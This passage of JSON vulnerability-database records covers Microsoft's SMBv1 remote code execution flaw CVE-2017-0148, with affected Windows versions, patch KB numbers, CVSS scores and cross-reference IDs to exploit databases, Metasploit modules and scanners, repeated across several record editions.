8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-12T04:44:31", "differentElements": ["msAffectedSoftware"], "edition": 37}, {"bulletin": {"id": "MS:CVE-2017-0148", "hash": "47d8cff84559a6e03e5ea58b880c90dc", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0148", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-09-12T06:51:00", "history": [], "viewCount": 106, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0148"]}, {"type": "symantec", "idList": ["SMNTC-96706"]}, {"type": "thn", "idList": ["THN:18A54BDD63D7DC2B3284D326E6510150"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:7F979181993247D214BE9DB570C22482", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:CE638F8710DF0090997AF6FB196E2595", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820"]}, {"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142548", "PACKETSTORM:156196"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-27752", "1337DAY-ID-33895", "1337DAY-ID-27786", "1337DAY-ID-33313"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:41987", "EDB-ID:47456"]}, {"type": "nessus", "idList": ["MS17-010.NASL", "700059.PRM", "SMB_NT_MS17-010.NASL", "700099.PRM"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10979", "KLA10977"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-12T06:51:00", "rev": 2}, "score": {"value": 7.3, "vector": "NONE", "modified": "2021-09-12T06:51:00", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB3205409", "KB4012606", "KB4013429", "KB4012212", "KB4012598", "KB4012213", "KB4012215", "KB3210721", "KB3205401", "KB4012216", "KB3212646", "KB3210720", "KB3213986", "KB4013198", "KBMS16-110, 3187754", "KB4012214", "KB3177186", "KB4012217"], "msrc": "", "mscve": "CVE-2017-0148", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-12T06:51:00", "differentElements": ["msAffectedSoftware"], "edition": 38}, {"bulletin": {"id": "MS:CVE-2017-0148", "hash": "1455b21b7b338994ddec7ae57c94d0af", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0148", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-09-12T20:49:50", "history": [], "viewCount": 106, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0148"]}, {"type": "symantec", "idList": ["SMNTC-96706"]}, {"type": "thn", "idList": ["THN:18A54BDD63D7DC2B3284D326E6510150"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:7F979181993247D214BE9DB570C22482", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:CE638F8710DF0090997AF6FB196E2595", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820"]}, {"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142548", "PACKETSTORM:156196"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-27752", "1337DAY-ID-33895", "1337DAY-ID-27786", "1337DAY-ID-33313"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:41987", "EDB-ID:47456"]}, {"type": "nessus", "idList": ["MS17-010.NASL", "700059.PRM", "SMB_NT_MS17-010.NASL", "700099.PRM"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10979", "KLA10977"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-12T06:51:00", "rev": 2}, "score": {"value": 7.3, "vector": "NONE", "modified": "2021-09-12T06:51:00", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB3205409", "KB4012606", "KB4013429", "KB4012212", "KB4012598", "KB4012213", "KB4012215", "KB3210721", "KB3205401", "KB4012216", "KB3212646", "KB3210720", "KB3213986", "KB4013198", "KBMS16-110, 3187754", "KB4012214", "KB3177186", "KB4012217"], "msrc": "", "mscve": "CVE-2017-0148", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": 